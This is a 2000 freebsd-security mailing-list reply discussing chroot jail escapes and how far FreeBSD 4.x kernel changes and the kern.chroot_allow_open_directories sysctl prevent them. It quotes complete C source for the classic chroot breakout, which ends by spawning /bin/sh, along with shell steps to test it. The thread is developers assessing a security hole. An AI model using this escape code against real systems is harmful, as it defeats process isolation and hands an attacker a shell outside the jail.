From owner-freebsd-security  Tue May 23  4:43:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21])
	by hub.freebsd.org (Postfix) with ESMTP id 0D0BB37B54E
	for <freebsd-security@FreeBSD.ORG>; Tue, 23 May 2000 04:43:46 -0700 (PDT)
	(envelope-from gdonl@tsc.tdk.com)
Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198])
	by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id EAA04592;
	Tue, 23 May 2000 04:39:38 -0700 (PDT)
	(envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194])
	by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id EAA63416;
	Tue, 23 May 2000 04:39:38 -0700 (PDT)
	(envelope-from Don.Lewis@tsc.tdk.com)
Received: (from gdonl@localhost)
	by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id EAA13204;
	Tue, 23 May 2000 04:39:36 -0700 (PDT)
From: Don Lewis <Don.Lewis@tsc.tdk.com>
Message-Id: <200005231139.EAA13204@salsa.gv.tsc.tdk.com>
Date: Tue, 23 May 2000 04:39:35 -0700
In-Reply-To: <2780.958684841@critter.freebsd.dk>
References:  <2780.958684841@critter.freebsd.dk>
X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98)
To: Poul-Henning Kamp <phk@critter.freebsd.dk>,
	Harold Gutch <logix@foobar.franken.de>
Subject: Re: envy.vuurwerk.nl daily run output
Cc: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>,
	Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>,
	freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On May 18, 11:20pm, Poul-Henning Kamp wrote:
} Subject: Re: envy.vuurwerk.nl daily run output
} 
} Please check the action of the "kern.chroot_allow_open_directories"
} for a deeper explanation of this one.  It is not set to zero for
} fear of compatibility issues.  Maybe we should set it to zero in
} -current to see if there are any such issues.

That only protects against carelessly written chroot wrappers that
leave file descriptors open that point to directories outside the
jail.  Given that, even a non-root process can escape.

Even with kern.chroot_allow_open_directories disabled, I know of
two ways that a process can escape if it can fork() and can
execute chroot() again (the latter requires the process to
be root), unless further modifications have been made to the
chroot syscall.  These changes have been in FreeBSD 4.x and later
since last September.

} In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes:

} >What about the "other" chroot-breakout, does it still work under
} >FreeBSD 4.0?

Try statically linking the executable and doing:
	mkdir jail jail/tmp
	cp a.out jail
	chroot jail a.out

This code should be able to escape the jail in 3.x.  In 4.x it will be
able to escape jail/tmp (if kern.chroot_allow_open_directories is enabled)
but it won't be able to escape jail.


} >Here's the breakout-code modulo checks wether /tmp exists etc.
} >
} >#include <fcntl.h>
} >#include <stdlib.h>
} >#include <unistd.h>
} > 
} >int main(int argc, char *argv[])
} >{
} >	int handle, i;
} > 
} >	handle = open("/", O_RDONLY);
} >	chroot("/tmp");
} >	chdir("/");
} >	fchdir(handle);
} >	for (i = 0; i < 32; i++)
} >		chdir("..");
} >	chroot(".");
} >	chdir("/");
} >	system("/bin/sh");
} >
} >	return 0;
} >}


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message